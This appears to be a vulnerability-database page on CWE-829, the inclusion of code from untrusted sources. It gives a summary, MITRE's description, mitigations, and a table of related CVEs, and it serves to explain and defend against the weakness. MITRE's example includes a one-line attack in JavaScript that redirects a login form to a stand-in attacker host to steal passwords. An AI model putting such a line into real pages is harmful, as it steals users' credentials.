
CWE-829 (Inclusion of Functionality from Untrusted Control Sphere) — Vulnerability Class 110

110 vulnerabilities classified as CWE-829 (Inclusion of Functionality from Untrusted Control Sphere). AI Chinese analysis included.

CWE-829 covers programs that import, require or include executable functionality from outside their intended control sphere: a script tag pointing at a third-party domain, a PHP include whose path or URL is derived from request input, a build that pulls a dependency without checking its checksum or signature. An attacker exploits it in one of two ways: by compromising the external source (the third-party host, a package repository, a mirror) so that the code the program already trusts turns malicious, or by steering the inclusion mechanism itself (a file-inclusion parameter, an unpinned dependency name) toward code the attacker controls. Either way the payload executes with the privileges of the including program. The root cause is usually trust by default: dependencies are loaded by name or URL with no check on their origin or integrity. Mitigation combines three things: restrict what can be included (a fixed allow-list selected by opaque identifiers, with every other input rejected), verify what is included (pinned versions, checksums, Subresource Integrity for browser scripts, signature verification for packages), and limit the blast radius (sandboxing, least privilege, and removing dependencies the application does not need). The CVEs listed below follow the same split: file-inclusion bugs in web interfaces (Junos J-Web, Cloudflow), dependency-verification bypasses in build tooling (Gradle), and a product that rendered user-generated content through a third-party library never meant for untrusted input (Nextcloud).

MITRE CWE Description
The product imports, requires, or includes executable functionality (such as a library) from a source that is outside of the intended control sphere.
Common Consequences (1)
Confidentiality, Integrity, Availability: Execute Unauthorized Code or Commands
An attacker could insert malicious functionality into the program by causing the program to download code that the attacker has placed into the untrusted control sphere, such as a malicious web site. This could enable the injection of malware, information exposure by granting excessive privileges or…
Mitigations (5)
Architecture and Design: Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482].
Architecture and Design: When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs. For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap [REF-45] provide this capability.
Architecture and Design: For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
Architecture and Design, Operation: Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For ex…
Effectiveness: Limited
Architecture and Design, Operation: Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database ad…
Examples (1)
This login webpage includes a weather widget from an external website:
<div class="header">
  Welcome!
  <div id="loginBox">
    Please Login:
    <form id="loginForm" name="loginForm" action="login.php" method="post">
      Username: <input type="text" name="username" /> <br/>
      Password: <input type="password" name="password" />
      <input type="submit" value="Login" />
    </form>
  </div>
  <div id="WeatherWidget">
    <script type="text/javascript" src="externalDomain.example.com/weatherwidget.js"></script>
  </div>
</div>
Bad · HTML
...Weather widget code....
document.getElementById('loginForm').action = "ATTACK.example.com/stealPassword.php";
Attack · JavaScript
CVE ID | Title | Product | CVSS | Severity | Published   (20 of the 110 listed CVEs shown; "-" = no severity recorded)
CVE-2022-4134 | glance security vulnerability | openstack | 3.5 | - | 2023-03-06
CVE-2023-26053 | Gradle usage of long IDs for PGP keys opens potential for collision attacks | gradle | 6.6 | Medium | 2023-03-02
CVE-2022-41216 | Cloudflow - Local File Inclusion Vulnerability | Cloudflow | 8.3 | High | 2023-02-22
CVE-2022-22246 | Junos OS: PHP file inclusion vulnerability in J-Web | Junos OS | 7.5 | High | 2022-10-18
CVE-2022-33317 | Mitsubishi Electric MC Works64 and ICONICS GENESIS64 security vulnerability | GENESIS64 | 7.8 | High | 2022-07-20
CVE-2022-31156 | Gradle's dependency verification can ignore checksum verification when signature verification cannot be performed | gradle | 6.6 | Medium | 2022-07-14
CVE-2021-41037 | Eclipse Equinox security vulnerability | Eclipse Equinox p2 | 10.0 | Critical | 2022-07-08
CVE-2022-24824 | Anonymous user cache poisoning in discourse | discourse | 5.3 | Medium | 2022-04-14
CVE-2022-1161 | ICSA-22-090-05 Rockwell Automation Logix Controllers | 1768 CompactLogix controllers | 10.0 | Critical | 2022-04-11
CVE-2022-23630 | Dependency verification bypass in Gradle | gradle | 7.5 | High | 2022-02-10
CVE-2021-41256 | Intent URI permissions manipulation in nextcloud news-android | news-android | 5.8 | Medium | 2021-11-30
CVE-2021-32802 | Preview generation used third-party library not suited for user-generated content in Nextcloud server | security-advisories | 9.3 | Critical | 2021-09-07
CVE-2021-3603 | Inclusion of Functionality from Untrusted Control Sphere in PHPMailer/PHPMailer | PHPMailer | 8.1 | High | 2021-06-17
CVE-2021-29427 | Repository content filters do not work in Settings pluginManagement | gradle | 8.0 | High | 2021-04-13
CVE-2020-8128 | jsreport code issue vulnerability | jsreport | 9.8 | - | 2020-02-14
CVE-2019-11770 | Eclipse Buildship cryptographic issue vulnerability | Eclipse Buildship | 8.1 | - | 2019-06-14
CVE-2019-10249 | Xtend and Xtext security feature issue vulnerability | Eclipse Xtext | 8.1 | - | 2019-05-06
CVE-2019-10248 | Eclipse Vorto security vulnerability | Eclipse Vorto | 8.1 | - | 2019-04-22
CVE-2019-10240 | Eclipse hawkBit cryptographic issue vulnerability | Eclipse hawkBit | 8.1 | - | 2019-04-03
CVE-2018-1122 | procps-ng permission and access control issue vulnerability | procps-ng, procps | 7.0 | - | 2018-05-23

Vulnerabilities classified as CWE-829 (Inclusion of Functionality from Untrusted Control Sphere) represent 110 CVEs. The CWE taxonomy describes the weakness class only; review each CVE for the product-specific impact.